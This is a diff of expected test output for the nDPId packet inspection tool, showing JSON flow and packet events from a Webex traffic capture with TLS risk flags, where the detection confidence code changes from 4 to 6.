-00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} 
@@ -19,11 +19,11 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS 
(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
-00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} 
@@ -36,20 +36,20 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete 
TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} 
